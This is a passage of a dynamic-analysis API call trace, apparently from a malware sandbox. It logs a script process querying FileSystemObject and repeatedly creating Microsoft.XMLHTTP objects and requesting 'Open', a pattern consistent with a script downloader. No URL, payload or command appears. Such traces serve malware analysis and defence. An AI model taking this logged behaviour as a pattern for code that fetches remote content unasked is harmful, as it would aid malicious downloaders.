	[0286.896] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0286.896] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0286.896] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0291.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0291.768] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0291.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0291.770] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0291.770] SysStringLen (param_1=0x0) returned 0x0
	[0291.770] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0291.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0291.770] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0291.770] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0291.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7288) returned 0x0
	[0291.770] ??2@YAPEAX_K@Z () returned 0x62f330
	[0291.770] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7288, pUnkSite=0x62f330) 
	[0291.770] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0291.770] XMLHTTPRequest:IUnknown:Release (This=0x49c7288) returned 0x0
	[0291.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0291.771] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0291.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0291.771] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0291.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0291.774] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0291.774] SysStringLen (param_1=0x0) returned 0x0
	[0291.774] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0291.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0291.774] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72e0) returned 0x0
	[0291.774] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0291.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72e0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74a8) returned 0x0
	[0291.775] ??2@YAPEAX_K@Z () returned 0x62f310
	[0291.775] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74a8, pUnkSite=0x62f310) 
	[0291.775] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0291.775] XMLHTTPRequest:IUnknown:Release (This=0x49c74a8) returned 0x0
	[0291.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72e0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72e0) returned 0x0
	[0291.775] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72e0) returned 0x3
	[0291.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0291.775] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72e0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0291.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72e0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0291.775] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0291.775] SysStringLen (param_1=0x0) returned 0x0
	[0291.775] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0291.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0291.776] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0291.776] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0291.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7288) returned 0x0
	[0291.776] ??2@YAPEAX_K@Z () returned 0x62f330
	[0291.776] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7288, pUnkSite=0x62f330) 
	[0291.776] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0291.776] XMLHTTPRequest:IUnknown:Release (This=0x49c7288) returned 0x0
	[0291.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0291.776] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0291.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0291.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0291.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0291.776] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0291.776] SysStringLen (param_1=0x0) returned 0x0
	[0291.776] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0291.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0291.777] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7340) returned 0x0
	[0291.777] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0291.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0291.777] ??2@YAPEAX_K@Z () returned 0x62f310
	[0291.777] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0291.777] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0291.777] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0291.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7340) returned 0x0
	[0291.777] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7340) returned 0x3
	[0291.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0291.777] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7340, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0291.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7340, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0291.777] longjmp () 
	[0291.778] longjmp () 
	[0291.778] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0291.778] SysStringLen (param_1=0x0) returned 0x0
	[0291.778] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0291.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0291.778] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0291.778] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0291.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0291.778] ??2@YAPEAX_K@Z () returned 0x62f330
	[0291.778] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f330) 
	[0291.778] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0291.778] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0291.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0291.778] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0291.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0291.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0291.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0291.779] longjmp () 
	[0291.779] longjmp () 
	[0291.779] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0291.779] SysStringLen (param_1=0x0) returned 0x0
	[0291.779] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0291.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0291.779] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0291.779] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0291.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0291.779] ??2@YAPEAX_K@Z () returned 0x62f310
	[0291.779] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0291.779] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0291.779] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0291.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0291.779] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0291.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
